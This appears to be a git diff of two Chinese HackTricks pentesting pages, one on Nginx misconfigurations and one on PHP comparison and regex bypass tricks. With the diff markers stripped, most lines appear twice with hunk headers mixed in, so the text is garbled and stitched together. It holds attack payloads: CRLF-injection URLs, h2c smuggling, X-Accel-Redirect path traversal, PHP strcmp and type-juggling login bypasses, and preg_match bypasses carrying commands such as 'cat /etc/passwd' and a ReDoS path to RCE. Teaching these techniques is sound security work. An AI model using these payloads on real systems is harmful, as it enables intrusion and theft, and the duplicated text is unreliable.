[proxy-waf-protections-bypass.md](../../pentesting-web/proxy-waf-protections-bypass.md)
{% endcontent-ref %}
## 不安全的变量使用 / HTTP请求拆分 <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
## 不安全的变量使用 / HTTP 请求拆分 <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
{% hint style="danger" %}
易受攻击的变量 `$uri``$document_uri`,可以通过将它们替换为 `$request_uri` 来修复。
正则表达式也可能存在漏洞,例如:
`location ~ /docs/([^/])? { … $1 … }` - 易受攻击
`location ~ /docs/([^/])? { … $1 … }` - 易受攻击&#x20;
`location ~ /docs/([^/\s])? { … $1 … }` - 不易受攻击(检查空格)
`location ~ /docs/(.*)? { … $1 … }` - 不易受攻击
{% endhint %}
以下示例演示了Nginx配置中的一个漏洞
Nginx 配置中的一个漏洞通过以下示例演示
```
location / {
return 302 https://example.com$uri;
}
```
字符 \r (回车) 和 \n (换行) 表示 HTTP 请求中的换行字符,它们的 URL 编码形式表示为 `%0d%0a`。在请求中包含这些字符 (例如,`http://localhost/%0d%0aDetectify:%20clrf`) 发送到配置错误的服务器会导致服务器发出一个名为 `Detectify` 的新标头。这是因为 $uri 变量解码了 URL 编码的换行字符,在响应中导致一个意外的标头:
在HTTP请求中字符\r回车和\n换行表示新行字符它们的URL编码形式表示为`%0d%0a`。在请求中包含这些字符(例如,`http://localhost/%0d%0aDetectify:%20clrf`)到一个配置错误的服务器,会导致服务器发出一个名为`Detectify`的新头。这是因为$uri变量解码了URL编码的新行字符从而导致响应中出现意外的头:
```
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
@ -109,29 +110,29 @@ Connection: keep-alive
Location: https://example.com/
Detectify: clrf
```
了解更多有关CRLF注入和响应拆分风险,请访问[https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).
了解有关 CRLF 注入和响应拆分风险的更多信息,请访问 [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/)。
此技术在[**这个讲得到解释**](https://www.youtube.com/watch?v=gWQyWdZbdoY\&list=PL0xCSYnG\_iTtJe2V6PQqamBF73n7-f1Nr\&index=77),其中提供了一些易受攻击的示例和检测机制。例如,为了从黑盒角度检测此错误配置,您可以使用以下请求:
外,这种技术在 [**这个讲中解释**](https://www.youtube.com/watch?v=gWQyWdZbdoY\&list=PL0xCSYnG\_iTtJe2V6PQqamBF73n7-f1Nr\&index=77) 中有一些脆弱的示例和检测机制。例如,为了从黑箱的角度检测这种错误配置,您可以使用以下请求:
- `https://example.com/%20X` - 任何HTTP代码
- `https://example.com/%20H` - 400 Bad Request
* `https://example.com/%20X` - 任何 HTTP 代码
* `https://example.com/%20H` - 400 错误请求
如果存在漏洞,第一个请求将返回为"X",因为"X"是任何HTTP方法而第二个请求将返回错误因为"H"不是有效的方法。因此,服务器将接收类似于`GET / H HTTP/1.1`的内容,从而触发错误。
如果存在漏洞,第一个将返回,因为 "X" 是任何 HTTP 方法,第二个将返回错误,因为 H 不是有效的方法。因此,服务器将接收到类似于 `GET / H HTTP/1.1` 的内容,这将触发错误。
其他检测示例包括
另一个检测示例是
- `http://company.tld/%20HTTP/1.1%0D%0AXXXX:%20x` - 任何HTTP代码
- `http://company.tld/%20HTTP/1.1%0D%0AHost:%20x` - 400 Bad Request
* `http://company.tld/%20HTTP/1.1%0D%0AXXXX:%20x` - 任何 HTTP 代码
* `http://company.tld/%20HTTP/1.1%0D%0AHost:%20x` - 400 错误请求
在该讲座中发现的一些易受攻击的配置包括
在该演讲中发现的一些脆弱配置是
- 请注意**`$uri`**是如何设置为最终URL中的。
* 注意 **`$uri`** 在最终 URL 中是如何设置的
```
location ^~ /lite/api/ {
proxy_pass http://lite-backend$uri$is_args$args;
}
```
* 请注意再次在 URL 中出现的 **`$uri`**(这次是作为参数的一部分
* 注意**`$uri`**再次出现在URL中这次在一个参数内
```
location ~ ^/dna/payment {
rewrite ^/dna/([^/]+) /registered/main.pl?cmd=unifiedPayment&context=$1&native_uri=$uri break;
@ -143,27 +144,27 @@ location /s3/ {
proxy_pass https://company-bucket.s3.amazonaws.com$uri;
}
```
### 任意变量
### Any variable
发现在某些情况下,**用户提供的数据**可能被视为**Nginx变量**。这种行为的原因仍然有些难以捉摸但并不罕见也不容易验证。这一异常在HackerOne的一份安全报告中得到了突出,可以在[这里](https://hackerone.com/reports/370094)查看。对错误消息的进一步调查导致在[Nginx代码库的SSI过滤模块](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365)中确定了其发生将服务器端包含SSI指定为根本原因。
发现**用户提供的数据**在某些情况下可能被视为**Nginx 变量**。这种行为的原因仍然有些模糊但并不罕见也不容易验证。这个异常在HackerOne的安全报告中得到了强调,可以在[这里](https://hackerone.com/reports/370094)查看。对错误消息的进一步调查导致识别出它在[Nginx代码库的SSI过滤模块](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365)中的发生确定服务器端包含SSI根本原因。
为了**检测这种错误配置**可以执行以下命令其中涉及设置一个referer头来测试变量打印:
要**检测此错误配置**,可以执行以下命令,该命令涉及设置引用头以测试变量打印:
```bash
$ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
```
系统中对此错误配置的扫描显示有多个实例允许用户打印Nginx变量。然而脆弱实例数量的减少表明修补此问题的努力在某种程度上取得了成功。
扫描此配置错误的系统揭示了多个实例其中用户可以打印Nginx变量。然而易受攻击实例数量的减少表明修补此问题的努力已取得一定成功。
## 后端原始响应读取
## 原始后端响应读取
Nginx通过`proxy_pass`提供了一个功能允许拦截后端产生的错误和HTTP标头旨在隐藏内部错误消息和标头。这是通过Nginx在响应后端错误时提供自定义错误页面来实现的。然而当Nginx遇到无效的HTTP请求时就会出现挑战。这样的请求会像接收到的那样转发到后端,然后后端的原始响应会直接发送给客户端而不经过Nginx的干预。
Nginx通过`proxy_pass`提供了一项功能允许拦截后端产生的错误和HTTP头旨在隐藏内部错误消息和头。这是通过Nginx在响应后端错误时提供自定义错误页面来实现的。然而当Nginx遇到无效的HTTP请求时,会出现挑战。这样的请求会按原样转发到后端,后端的原始响应随后直接发送给客户端而不经过Nginx的干预。
考虑涉及uWSGI应用程序的示例场景:
考虑一个涉及uWSGI应用的示例场景
```python
def application(environ, start_response):
start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')])
return [b"Secret info, should not be visible!"]
```
为了管理这需要在Nginx配置中使用特定的指令:
为了管理这一点,在 Nginx 配置中使用了特定的指令:
```
http {
error_page 500 /html/error.html;
@ -171,34 +172,34 @@ proxy_intercept_errors on;
proxy_hide_header Secret-Header;
}
```
* [**proxy\_intercept\_errors**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors): 此指令使Nginx能够为后端响应的状态码大于300的情况提供自定义响应。确保对于我们的示例uWSGI应用程序Nginx会拦截并处理`500错误`响应
* [**proxy\_hide\_header**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header): 正如其名称所示,此指令会隐藏指定的HTTP标头,增强隐私和安全性。
* [**proxy\_intercept\_errors**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors): 此指令使 Nginx 能够为状态码大于 300 的后端响应提供自定义响应。它确保对于我们的示例 uWSGI 应用程序,`500 错误` 响应被 Nginx 拦截并处理
* [**proxy\_hide\_header**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header): 正如其名称所示,此指令从客户端隐藏指定的 HTTP 头,增强隐私和安全性。
当发出有效的`GET`请求时Nginx会正常处理它返回标准错误响应而不会透露任何秘密标头。然而无效的HTTP请求会绕过此机制,导致原始后端响应的暴露,包括秘密头和错误消息。
当发出有效的 `GET` 请求时Nginx 正常处理,返回标准错误响应而不泄露任何秘密头。然而,无效的 HTTP 请求绕过此机制,导致原始后端响应的暴露,包括秘密头和错误消息。
## 将`merge_slashes`设置为关闭
## merge\_slashes 设置为 off
默认情况下Nginx的**`merge_slashes`指令**设置为**`on`**它会将URL中的多个斜杠压缩为单个斜杠。这个功能虽然简化了URL处理但可能会意外地隐藏在Nginx后面的应用程序中的漏洞特别是那些容易受到本地文件包含LFI攻击的应用程序。安全专家**Danny Robinson和Rotem Bar**已经强调了与这种默认行为相关的潜在风险特别是当Nginx充当反向代理时。
默认情况下Nginx**`merge_slashes` 指令** 设置为 **`on`**,这会将 URL 中的多个正斜杠压缩为一个斜杠。此功能虽然简化了 URL 处理,但可能无意中掩盖了 Nginx 后面应用程序中的漏洞,特别是那些容易受到本地文件包含 (LFI) 攻击的应用程序。安全专家 **Danny Robinson 和 Rotem Bar** 强调了这种默认行为可能带来的风险,尤其是当 Nginx 作为反向代理时。
为了减轻这种风险,建议**关闭`merge_slashes`指令**以保护容易受到这些漏洞影响的应用程序。这样可以确保Nginx将请求转发给应用程序而不会改变URL结构从而不会掩盖任何潜在的安全问题。
为了减轻此类风险,建议对易受这些漏洞影响的应用程序 **关闭 `merge_slashes` 指令**。这确保 Nginx 在不改变 URL 结构的情况下将请求转发到应用程序,从而不掩盖任何潜在的安全问题。
有关更多信息,请查看[Danny Robinson和Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d)。
有关更多信息,请查看 [Danny Robinson Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d)。
### **恶意响应头**
### **恶意响应头**
如[**此**](https://mizu.re/post/cors-playground)所示如果Web服务器的响应中存在某些它们将改变Nginx代理的行为。您可以在[**文档中**](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/)查看它们
[**此文**](https://mizu.re/post/cors-playground) 所示,如果Web 服务器的响应中存在某些头,它们将改变 Nginx 代理的行为。您可以在 [**文档中查看**](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/)
* `X-Accel-Redirect`指示Nginx内部重定向到指定位置。
* `X-Accel-Buffering`控制Nginx是否应该缓冲响应。
* `X-Accel-Charset`在使用X-Accel-Redirect时设置响应的字符集。
* `X-Accel-Expires`在使用X-Accel-Redirect时设置响应的过期时间。
* `X-Accel-Limit-Rate`在使用X-Accel-Redirect时限制响应的传输速率。
* `X-Accel-Redirect`: 指示 Nginx 将请求内部重定向到指定位置。
* `X-Accel-Buffering`: 控制 Nginx 是否应缓冲响应。
* `X-Accel-Charset`: 在使用 X-Accel-Redirect 时设置响应的字符集。
* `X-Accel-Expires`: 在使用 X-Accel-Redirect 时设置响应的过期时间。
* `X-Accel-Limit-Rate`: 在使用 X-Accel-Redirect 时限制响应的传输速率。
例如,标头**`X-Accel-Redirect`**会在Nginx中引发内部**重定向**。因此如果nginx配置中有类似**`root /`**的内容而Web服务器的响应中有**`X-Accel-Redirect: .env`**将导致nginx发送**`/.env`**的内容(路径遍历)。
例如,**`X-Accel-Redirect`** 将导致 Nginx 内部 **重定向**。因此,具有类似 **`root /`** 的 Nginx 配置和来自 Web 服务器的响应 **`X-Accel-Redirect: .env`** 将使 Nginx 发送 **`/.env`** 的内容(路径遍历)。
### **Map指令中的默认值**
### **映射指令中的默认值**
**Nginx配置**中,`map`指令通常在**授权控制**中发挥作用。一个常见的错误是没有指定**默认**值,这可能导致未经授权的访问。例如:
**Nginx 配置**中,`map` 指令通常在 **授权控制** 中发挥作用。一个常见的错误是未指定 **默认** 值,这可能导致未经授权的访问。例如:
```yaml
http {
map $uri $mappocallow {
@ -217,27 +218,27 @@ return 200 "Hello. It is private area: $mappocallow";
}
}
```
`/map-poc` 内访问**未定义的 URI**时,**恶意用户**可以绕过安全性。[Nginx 手册](https://nginx.org/en/docs/http/ngx_http_map_module.html)建议设置**默认值**以避免此类问题。
没有 `default`**恶意用户**可以通过访问 `/map-poc` 中的 **未定义 URI**绕过安全性。[Nginx 手册](https://nginx.org/en/docs/http/ngx\_http\_map\_module.html) 建议设置 **默认值** 以避免此类问题。
### **DNS欺骗漏洞**
### **DNS 欺骗漏洞**
在某些条件下,对 Nginx 进行 DNS 欺骗是可行的。如果攻击者知道 Nginx 使用的**DNS服务器**并能拦截其 DNS 查询,则可以欺骗 DNS 记录。然而,如果 Nginx 配置为使用**本地主机 (127.0.0.1)** 进行 DNS 解析则此方法无效。Nginx 允许如下指定 DNS 服务器:
在某些条件下,对 Nginx 进行 DNS 欺骗是可行的。如果攻击者知道 Nginx 使用的 **DNS 服务器** 并且能够拦截其 DNS 查询,他们可以伪造 DNS 记录。然而,如果 Nginx 配置为使用 **localhost (127.0.0.1)** 进行 DNS 解析则此方法无效。Nginx 允许如下指定 DNS 服务器:
```yaml
resolver 8.8.8.8;
```
### **`proxy_pass`和`internal`指令**
### **`proxy_pass` `internal` 指令**
**`proxy_pass`**指令用于将请求重定向到其他服务器,无论是在内部还是在外部。**`internal`**指令确保某些位置仅在Nginx内部可访问。虽然这些指令本身并非漏洞但它们的配置需要仔细检查以防止安全漏洞。
**`proxy_pass`** 指令用于将请求重定向到其他服务器,无论是内部还是外部。**`internal`** 指令确保某些位置仅在 Nginx 内部可访问。虽然这些指令本身并不是漏洞,但其配置需要仔细检查以防止安全漏洞。
## proxy\_set\_header Upgrade & Connection
如果nginx服务器配置为传递Upgrade和Connection标头则可能会执行[h2c Smuggling攻击](../../pentesting-web/h2c-smuggling.md)以访问受保护/内部端点。
如果 nginx 服务器配置为传递 Upgrade 和 Connection 头,则可以执行 [**h2c Smuggling attack**](../../pentesting-web/h2c-smuggling.md) 来访问受保护的/内部端点。
{% hint style="danger" %}
此漏洞将允许攻击者与`proxy_pass`端点(在本例中为`http://backend:9999`建立直接连接nginx不会检查其内容
此漏洞将允许攻击者 **与 `proxy_pass` 端点建立直接连接**(在此情况下为 `http://backend:9999`),其内容不会被 nginx 检查
{% endhint %}
以下是一个易受攻击配置的示例,可从[此处](https://bishopfox.com/blog/h2c-smuggling-request)窃取`/flag`
从 [这里](https://bishopfox.com/blog/h2c-smuggling-request) 偷取 `/flag` 的脆弱配置示例
```
server {
listen 443 ssl;
@ -258,12 +259,12 @@ deny all;
}
```
{% hint style="warning" %}
请注意,即使 `proxy_pass` 指向特定的 **路径**比如 `http://backend:9999/socket.io`,连接也将建立在 `http://backend:9999`,因此您可以**访问内部端点中的任何其他路径。因此,在 proxy\_pass 的 URL 中指定路径并不重要。**
请注意,即使 `proxy_pass` 指向特定的 **路径**例如 `http://backend:9999/socket.io`,连接仍将与 `http://backend:9999` 建立,因此您可以 **联系该内部端点内的任何其他路径。因此proxy_pass 的 URL 中指定路径并不重要。**
{% endhint %}
## 亲自尝试
## 尝试一下
Detectify 创建了一个 GitHub 存储库,您可以使用 Docker 设置自己的易受攻击的 Nginx 测试服务器,其中包含本文讨论的一些错误配置,并尝试自行查找它们!
Detectify 创建了一个 GitHub 库,您可以使用 Docker 设置自己的易受攻击的 Nginx 测试服务器,包含本文讨论的一些错误配置,并尝试自己找到它们!
[https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx)
@ -271,11 +272,11 @@ Detectify 创建了一个 GitHub 存储库,您可以使用 Docker 设置自己
### [GIXY](https://github.com/yandex/gixy)
Gixy 是一个用于分析 Nginx 配置的工具。Gixy 的主要目标是防止安全配置错误并自动化缺陷检测
Gixy 是一个分析 Nginx 配置的工具。Gixy 的主要目标是防止安全错误配置并自动检测缺陷
### [Nginxpwner](https://github.com/stark0de/nginxpwner)
Nginxpwner 是一个简单的工具,用于查找常见的 Nginx 配置错误和漏洞。
Nginxpwner 是一个简单的工具,用于查找常见的 Nginx 错误配置和漏洞。
## 参考资料
@ -285,20 +286,21 @@ Nginxpwner 是一个简单的工具,用于查找常见的 Nginx 配置错误
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从侦察到报告,使用 20 多种工具和功能运行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客攻击:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 存储库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

235
network-services-pentesting/pentesting-web/php-tricks-esp/README.md
View file

@ -1,18 +1,19 @@
# PHP 技巧
# PHP Tricks
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -20,7 +21,7 @@
## Cookies 常见位置:
也适用于 phpMyAdmin 的 cookies。
同样适用于 phpMyAdmin cookies。
Cookies:
```
@ -36,28 +37,28 @@ Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e
```
## 绕过 PHP 比较
### 弱比较/类型转换(==
### 松散比较/类型转换 ( == )
如果在 PHP 中使用 `==`,则存在意外情况,比较的行为与预期不符。这是因为 "==" 只比较转换为相同类型的值,如果您还想比较所比较数据的类型是否相同,您需要使用 `===`
如果在 PHP 中使用 `==`,则会出现一些意想不到的情况,比较的行为并不如预期。这是因为 "==" 只比较转换为相同类型的值,如果你还想比较被比较数据的类型是否相同,你需要使用 `===`
PHP 比较表[https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
PHP 比较表: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
![](<../../../.gitbook/assets/image (567).png>)
{% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
- `"string" == 0 -> True` 以非数字开头的字符串等于数字
- `"0xAAAA" == "43690" -> True` 由十进制或十六进制格式的数字组成的字符串可以与其他数字/字符串进行比较,如果数字相同则结果为 True字符串中的数字被解释为数字
- `"0e3264578" == 0 --> True` 以 "0e" 开头并跟随任何内容的字符串将等于 0
- `"0X3264578" == 0X --> True` 以 "0" 开头并跟随任何字母X 可以是任何字母)和任何内容的字符串将等于 0
- `"0e12334" == "0" --> True` 这非常有趣,因为在某些情况下,您可以控制以 "0" 开头的字符串输入以及正在进行哈希并与之进行比较的某些内容。因此,如果您可以提供一个将创建以 "0e" 开头且没有任何字母的哈希的值,您可以绕过比较。您可以在此处找到具有此格式的**已经哈希的字符串**[https://github.com/spaze/hashes](https://github.com/spaze/hashes)
- `"X" == 0 --> True` 字符串中的任何字母等于整数 0
* `"string" == 0 -> True` 一个不以数字开头的字符串等于一个数字
* `"0xAAAA" == "43690" -> True` 由十进制或十六进制格式的数字组成的字符串可以与其他数字/字符串进行比较,如果数字相同则结果为 True字符串中的数字被解释为数字
* `"0e3264578" == 0 --> True` 一个以 "0e" 开头并后跟任何内容的字符串将等于 0
* `"0X3264578" == 0X --> True` 一个以 "0" 开头并后跟任何字母X 可以是任何字母)并后跟任何内容的字符串将等于 0
* `"0e12334" == "0" --> True` 这非常有趣,因为在某些情况下你可以控制 "0" 的字符串输入以及与之进行哈希比较的某些内容。因此,如果你可以提供一个值,该值将创建一个以 "0e" 开头且没有任何字母的哈希,你可以绕过比较。你可以在这里找到 **已经哈希的字符串** 这种格式[https://github.com/spaze/hashes](https://github.com/spaze/hashes)
* `"X" == 0 --> True` 字符串中的任何字母等于 int 0
更多信息请参阅 [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
更多信息请 [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
### **in\_array()**
**类型转换** 也会影响到 `in_array()` 函数,默认情况下(需要将第三个参数设置为 true 才能进行严格比较):
**类型转换** 也默认影响 `in_array()` 函数(你需要将第三个参数设置为 true 以进行严格比较):
```php
$values = array("apple","orange","pear","grape");
var_dump(in_array(0, $values));
@ -67,26 +68,28 @@ var_dump(in_array(0, $values, true));
```
### strcmp()/strcasecmp()
如果此函数用于**任何身份验证检查**如检查密码),并且用户控制比较的一侧,他可以发送一个空数组而不是一个字符串作为密码的值(`https://example.com/login.php/?username=admin&password[]=`),从而绕过此检查:
如果此函数用于**任何身份验证检查**(如检查密码),并且用户控制比较的一侧,他可以发送一个空数组而不是字符串作为密码的值(`https://example.com/login.php/?username=admin&password[]=`),从而绕过此检查:
```php
if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
```
相同的错误发生在 `strcasecmp()`
### 严格类型转换
即使使用 `===`,仍可能出现错误,使比较容易受到类型转换的影响。例如,如果比较在比较之前将数据转换为不同类型的对象:
即使使用`===`,也可能出现错误,使得比较容易受到类型转换的影响。例如,如果比较在比较之前将数据转换为不同类型的对象:
```php
(int) "1abc" === (int) "1xyz" //This will be true
```
### preg\_match(/^.\*/)
**`preg_match()`** 可用于**验证用户输入**(它**检查**用户输入中是否存在**黑名单**中的任何**单词/正则表达式**,如果没有,则代码可以继续执行)。
**`preg_match()`** 可以用来 **验证用户输入**(它 **检查** 是否有任何 **单词/正则表达式****黑名单****存在****用户输入** 中,如果没有,代码可以继续执行)。
#### 换行符绕过
#### New line bypass
然而,当限定正则表达式的开头时,`preg_match()` **只检查用户输入的第一行**,因此如果你可以以**多行**的方式发送输入,就可以绕过这个检查。示例:
然而,当限定正则表达式的开始时,`preg_match()` **只检查用户输入的第一行**,因此如果你能够以 **多行** 发送输入,你可能能够绕过这个检查。示例:
```php
$myinput="aaaaaaa
11111111"; //Notice the new line
@ -99,38 +102,40 @@ echo preg_match("/^.*1/",$myinput);
echo preg_match("/^.*1.*$/",$myinput);
//0 --> In this scenario preg_match DOESN'T find the char "1"
```
要绕过此检查,您可以使用**新行进行url编码**`%0A`)发送值,或者如果可以发送**JSON数据**,请将其发送在**多行**中
要绕过此检查,您可以**发送带有换行符的 URL 编码值**`%0A`),或者如果您可以发送**JSON 数据**,则将其分成**多行**发送
```php
{
"cmd": "cat /etc/passwd"
}
```
找到一个示例:[https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice)
找到一个例子在这里: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice)
#### **长度错误绕过**
(这个绕过似乎是在 PHP 5.2.5 上尝试的,我无法在 PHP 7.3.15 上使其工作)\
如果你可以`preg_match()` 发送一个非常**大的有效输入**,它将**无法处理**它,你将能够**绕过**检查。例如,如果它在黑名单中列出了一个 JSON你可以发送
(这个绕过显然是在 PHP 5.2.5 上尝试的,我无法在 PHP 7.3.15 上使其工作)\
如果你可以发送给 `preg_match()` 一个有效的非常 **大的输入**,它 **将无法处理**,你将能够 **绕过** 检查。例如,如果它正在黑名单一个 JSON你可以发送
```bash
payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'
```
From: [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0)
#### ReDoS Bypass
Trick from: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223) and [https://mizu.re/post/pong](https://mizu.re/post/pong)
<figure><img src="../../../.gitbook/assets/image (26).png" alt=""><figcaption></figcaption></figure>
简而言之,问题发生在 PHP 中的 `preg_*` 函数建立在 [PCRE 库](http://www.pcre.org/) 的基础上。在 PCRE 中,某些正则表达式是通过大量递归调用来匹配的,这会使用大量堆栈空间。可以设置允许的递归次数上限,但在 PHP 中,此限制[默认为 100,000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit),这超出了堆栈的容量。
简而言之,问题发生是因为 PHP 中的 `preg_*` 函数基于 [PCRE 库](http://www.pcre.org/)。在 PCRE 中,某些正则表达式通过大量递归调用进行匹配,这会消耗大量的堆栈空间。可以设置允许的递归次数限制,但在 PHP 中,这个限制 [默认为 100,000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit),这超过了堆栈的容量。
[这个 Stackoverflow 帖子](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) 也在帖子中链接,其中更深入讨论了这个问题。我们的任务现在很明确:\
**发送一个输入,使正则表达式执行 100,000+ 次递归,导致 SIGSEGV使 `preg_match()` 函数返回 `false`,从而使应用程序认为我们的输入不是恶意的,在有效载荷的末尾抛出类似 `{system(<verybadcommand>)} `的惊喜,以获取 SSTI --> RCE --> flag :)**。
[这个 Stackoverflow 线程](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) 也在帖子中链接,深入讨论了这个问题。我们的任务现在很明确:\
**发送一个输入,使正则表达式进行 100\_000+ 次递归,导致 SIGSEGV使得 `preg_match()` 函数返回 `false`,从而使应用程序认为我们的输入不是恶意的,在有效负载的最后抛出一个像 `{system(<verybadcommand>)}` 的惊喜以获得 SSTI --> RCE --> flag :)**。
